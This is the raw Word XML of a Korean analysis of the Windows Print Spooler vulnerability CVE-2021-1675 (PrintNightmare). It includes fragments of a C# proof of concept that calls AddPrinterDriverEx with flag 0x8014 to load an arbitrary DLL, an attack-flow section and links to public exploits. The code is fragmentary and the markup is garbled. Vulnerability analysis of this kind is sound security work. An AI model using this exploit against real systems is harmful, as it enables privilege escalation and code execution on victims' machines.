    <w:p w14:paraId="716992B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A2EBEF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RIVER_INFO_2 Level2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VER_INFO_2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E61CC7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8ED17D8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Version = 3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB878A1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Nam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V0xe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11F8BD6A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Environmen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dows x6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E8747FA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DriverPath = driverpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E10BB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DataFile = datafile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328AAF9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ConfigFile = datafile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7FEEEF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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFDF294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501AF7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s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x8014;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="382751A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74E217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ntPtr pLevel2 = Marshal.AllocHGlobal(Marshal.SizeOf(Level2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A12657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rshal.StructureToPtr(Level2, pLevel2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ECA9F2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47913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ddPrinterDriverE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, pLevel2, flag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A9B28A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rshal.FreeHGlobal(pLevel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D7251C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B7F5F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Name = Path.GetFileName(datafi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D64DBA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4C63DA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10; i++)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9F5A2A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E52F165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vel2.pConfigFil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C:\\Windows\\System32\\spool\\drivers\\x64\\3\\Old\\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i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\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fileName}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03A9D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IntPtr pLevel2_ = Marshal.AllocHGlobal(Marshal.SizeOf(Level2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A96E07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Marshal.StructureToPtr(Level2, pLevel2_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92EF745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D1066E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bookmarkStart w:id="2" w:name="_Hlk78626648"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="돋움체" w:eastAsia="돋움체" w:cs="돋움체"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>AddPrinterDriverEx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2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, pLevel2_, flag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2F0872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Marshal.FreeHGlobal(pLevel2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07E7B54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F4DFEF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E3BEF9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 args)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C63A98E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66C98C8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s.Length == 0 | args.Length &gt; 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2E159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5FEE8A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elp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F30C569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D120617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ing argumentDriverPath = args[0].ToString().ToLower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7807BFF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ing argumentDll = args[1].ToString().ToLower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7219EB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DriverPath.Starts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driverpath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argumentDll.Starts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dll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FD35583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984337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ring driverPath = argumentDriverPath.Remove(0, 1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FB6606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ring dataFile = argumentDll.Remove(0, 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29C130D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PrinterDriver(driverPath, dataFi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8939AD6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Vulnerability CVE-2021-1675 executed!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1A7D7AB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F097005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81B52C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B44340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elp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28BC04F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65D8E82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E30FC25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8461F70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530D93C" w14:textId="77777777" w:rsidR="00B94E7C" w:rsidRDefault="00B94E7C" w:rsidP="00B94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BF72F3" w14:textId="4033234E" w:rsidR="00B94E7C" w:rsidRDefault="00B94E7C" w:rsidP="00B94E7C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04DE363D" w14:textId="5F0AE033" w:rsidR="00054D03" w:rsidRDefault="00054D03" w:rsidP="00B94E7C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코드는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00054D03">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AddPrinterDriverEx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()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0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>8014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flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">값을 넣었을 경우 </w:t>
      </w:r>
      <w:r w:rsidRPr="00054D03">
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>dataFile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>이 변화되었는지 확인할 수 있도록 해주는 코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상적으로 권한 검사를 우회한 경우 아래와 같이 확인할 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7054013D" w14:textId="77777777" w:rsidR="00A92AFD" w:rsidRDefault="00054D03" w:rsidP="00A92AFD">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r w:rsidRPr="00191BCC">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D2A55F" wp14:editId="32287738">
            <wp:extent cx="5700616" cy="216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-3" r="-93" b="27783"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5736650" cy="217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1AB1" w14:textId="2BB00657" w:rsidR="00054D03" w:rsidRDefault="00A92AFD" w:rsidP="00A92AFD">
      <w:pPr>
        <w:pStyle w:val="a6"/>
      </w:pPr>
      <w:r>
        <w:t>사진 9 POC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ode </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:t>un</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68800D2A" w14:textId="413F708D" w:rsidR="00191BCC" w:rsidRDefault="00054D03" w:rsidP="00B94E7C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054D03">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[공격흐름</w:t>
      </w:r>
      <w:r w:rsidRPr="00054D03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CDB9E6" w14:textId="64701C04" w:rsidR="00054D03" w:rsidRDefault="00054D03" w:rsidP="00B94E7C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결과적으로 전체적인 공격 흐름은 다음과 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEFB03A" w14:textId="249280DF" w:rsidR="004D308E" w:rsidRDefault="004D308E" w:rsidP="00B94E7C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7DBDF6" wp14:editId="45212B9A">
            <wp:extent cx="5717070" cy="2732101"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="114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8"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5876498" cy="2808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C142" w14:textId="3810B713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</w:p>
    <w:p w14:paraId="2C236B3B" w14:textId="5083DBD3" w:rsidR="00F072DC" w:rsidRDefault="00F072DC" w:rsidP="00F072DC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054D03"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ference</w:t>
      </w:r>
      <w:r w:rsidRPr="00054D03">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744C3348" w14:textId="66C25D97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19" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://msrc.microsoft.com/update-guide/ko-kr/vulnerability/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AD1A247" w14:textId="470C2B84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0" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="536F7FAB" w14:textId="0148C556" w:rsidR="00F072DC" w:rsidRDefault="00F072DC" w:rsidP="00B94E7C">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4D83BBFE" w14:textId="58731EC0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2" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://www.kb.cert.org/vuls/id/383432</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="259327FB" w14:textId="5EC80782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3" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://packetstormsecurity.com/files/163349/Microsoft-PrintNightmare-Proof-Of-Concept.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="033E2ABE" w14:textId="524E08BA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4" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://thalpius.com/2021/07/16/windows-print-spooler-elevation-of-privilege-vulnerability-cve-2021-1675-explained/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31A814D9" w14:textId="514F3C16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5" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://blog.truesec.com/2021/06/30/exploitable-critical-rce-vulnerability-allows-regular-users-to-fully-compromise-active-directory-printnightmare-cve-2021-1675/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4BC3556C" w14:textId="36D63329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6" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://github.com/cube0x0/CVE-2021-1675</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="12E2E382" w14:textId="27227FD2" w:rsidR="00F072DC" w:rsidRDefault="00F072DC" w:rsidP="00B94E7C">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="004A04C3">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>https://hackyboiz.github.io/2021/07/01/l0ch/2021-07-01/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="44285833" w14:textId="77777777" w:rsidR="00F072DC" w:rsidRPr="00F072DC" w:rsidRDefault="00F072DC" w:rsidP="00B94E7C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sectPr w:rsidR="00F072DC" w:rsidRPr="00F072DC" w:rsidSect="00FE1FA8">
      <w:footerReference w:type="default" r:id="rId28"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1701" w:right="1440" w:bottom="1440" w:left="144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32C" w14:textId="77777777" w:rsidR="00C33987" w:rsidRDefault="00C33987" w:rsidP="005A73A8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3E7F94E8" w14:textId="77777777" w:rsidR="00C33987" w:rsidRDefault="00C33987" w:rsidP="005A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69892"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="2191D200" w14:textId="050F2964" w:rsidR="00FE1FA8" w:rsidRDefault="00FE1F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15F38F" w14:textId="77777777" w:rsidR="00FE1FA8" w:rsidRDefault="00FE1F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9873" w14:textId="77777777" w:rsidR="00C33987" w:rsidRDefault="00C33987" w:rsidP="005A73A8">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7E35816F" w14:textId="77777777" w:rsidR="00C33987" w:rsidRDefault="00C33987" w:rsidP="005A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88C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="674EB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13156"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6D65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BD1D9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0BD42E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D51D00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="817E1D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801ED9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3DB6E7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411741"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9E5820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4C362E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63BC7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FD"/>
    <w:rsid w:val="00021085"/>
    <w:rsid w:val="00054D03"/>
    <w:rsid w:val="0008410B"/>
    <w:rsid w:val="000A61BA"/>
    <w:rsid w:val="000E41B0"/>
    <w:rsid w:val="000F0695"/>
    <w:rsid w:val="00191BCC"/>
    <w:rsid w:val="001A4CDA"/>
    <w:rsid w:val="001B6230"/>
    <w:rsid w:val="001F39F4"/>
    <w:rsid w:val="002548B0"/>
    <w:rsid w:val="002F0421"/>
    <w:rsid w:val="00353472"/>
    <w:rsid w:val="00367702"/>
    <w:rsid w:val="003F5D47"/>
    <w:rsid w:val="004D308E"/>
    <w:rsid w:val="004E6F89"/>
    <w:rsid w:val="005A73A8"/>
    <w:rsid w:val="006458CB"/>
    <w:rsid w:val="0067308E"/>
    <w:rsid w:val="006F2068"/>
    <w:rsid w:val="0073324F"/>
    <w:rsid w:val="00835F76"/>
    <w:rsid w:val="008E15D6"/>
    <w:rsid w:val="00993451"/>
    <w:rsid w:val="00993AE6"/>
    <w:rsid w:val="009C231E"/>
    <w:rsid w:val="009E113D"/>
    <w:rsid w:val="00A22F81"/>
    <w:rsid w:val="00A53E94"/>
    <w:rsid w:val="00A92AFD"/>
    <w:rsid w:val="00B76943"/>
    <w:rsid w:val="00B94E7C"/>
    <w:rsid w:val="00C31E8B"/>
    <w:rsid w:val="00C33987"/>
    <w:rsid w:val="00C75A82"/>
    <w:rsid w:val="00CC7959"/>
    <w:rsid w:val="00D640D0"/>
    <w:rsid w:val="00DF313A"/>
    <w:rsid w:val="00E050FD"/>
    <w:rsid w:val="00E3020F"/>
    <w:rsid w:val="00E33929"/>
    <w:rsid w:val="00E33C0C"/>
    <w:rsid w:val="00E4591E"/>
    <w:rsid w:val="00E544B5"/>
    <w:rsid w:val="00E54647"/>
    <w:rsid w:val="00E94A55"/>
    <w:rsid w:val="00EB4EE6"/>
    <w:rsid w:val="00EF333C"/>
    <w:rsid w:val="00F072DC"/>
    <w:rsid w:val="00F2157E"/>
    <w:rsid w:val="00F53627"/>
    <w:rsid w:val="00F85607"/>
    <w:rsid w:val="00FC3855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64860"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{164FA651-E5B5-4DF1-AA8E-F82745D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D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050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050FD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EF333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F042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F0421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F85607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9E113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5A7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A73A8"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a9">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="Char0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="005A7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A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rc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-344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cube0x0/CVE-2021-16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vd.nist.gov/vuln/detail/CVE-2021-167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log.truesec.com/2021/06/30/exploitable-critical-rce-vulnerability-allows-regular-users-to-fully-compromise-active-directory-printnightmare-cve-2021-167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ve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-16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halpius.com/2021/07/16/windows-print-spooler-elevation-of-privilege-vulnerability-cve-2021-1675-expl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acketstormsecurity.com/files/163349/Microsoft-PrintNightmare-Proof-Of-Concept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src.microsoft.com/update-guide/ko-kr/vulnerability/CVE-2021-16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b.cert.org/vuls/id/383432" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hackyboiz.github.io/2021/07/01/l0ch/2021-07-0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2FE2-958F-4983-BADD-436C1E9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준서</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>배준서</cp:lastModifiedBy>
  <cp:revision>20</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-07-23T10:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-31T04:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>